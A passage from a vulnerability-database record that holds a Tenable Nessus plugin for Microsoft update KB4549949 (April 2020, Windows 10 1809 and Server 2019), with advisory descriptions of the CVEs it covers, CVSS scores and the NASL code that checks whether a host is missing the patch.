hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:11:07", "description": "The remote Windows host is missing security update 4549949.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-0917, CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4549949: Windows 10 Version 1809 and Windows Server 2019 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4549949.NASL", "href": "https://www.tenable.com/plugins/nessus/135463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135463);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0910\",\n \"CVE-2020-0913\",\n \"CVE-2020-0917\",\n \"CVE-2020-0918\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4549949\");\n script_xref(name:\"MSFT\", value:\"MS20-4549949\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4549949: Windows 10 Version 1809 and Windows Server 2019 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4549949.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-0917,\n CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4549949/windows-10-update-kb4549949\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3387c2f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4549949.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4549949');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549949])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n 